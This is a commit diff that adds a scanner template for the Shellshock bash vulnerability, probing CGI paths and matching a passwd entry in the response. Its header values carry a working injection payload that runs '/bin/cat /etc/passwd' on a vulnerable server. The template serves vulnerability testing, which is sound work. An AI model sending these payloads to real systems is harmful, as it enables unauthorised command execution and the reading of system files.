CVE-2014-6271 Shellshock
parent
ffedf2c3fb
commit
970a81c9eb
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2014-6271
|
||||
|
||||
info:
|
||||
name: Shellshock
|
||||
author: pentest_swissky
|
||||
severity: high
|
||||
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
||||
# reference: https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}/cgi-bin/status"
|
||||
- "{{BaseURL}}/cgi-bin/stats"
|
||||
- "{{BaseURL}}/cgi-bin/test"
|
||||
- "{{BaseURL}}/cgi-bin/status/status.cgi"
|
||||
- "{{BaseURL}}/test.cgi"
|
||||
- "{{BaseURL}}/debug.cgi"
|
||||
headers:
|
||||
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue